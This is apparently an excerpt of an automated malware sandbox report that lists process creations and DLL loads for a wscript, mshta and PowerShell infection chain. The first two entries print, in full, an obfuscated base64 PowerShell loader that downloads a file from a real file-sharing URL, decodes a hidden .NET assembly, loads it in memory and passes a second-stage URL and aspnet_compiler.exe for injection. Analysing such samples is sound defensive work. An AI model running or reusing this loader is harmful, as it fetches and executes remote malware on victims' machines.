                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
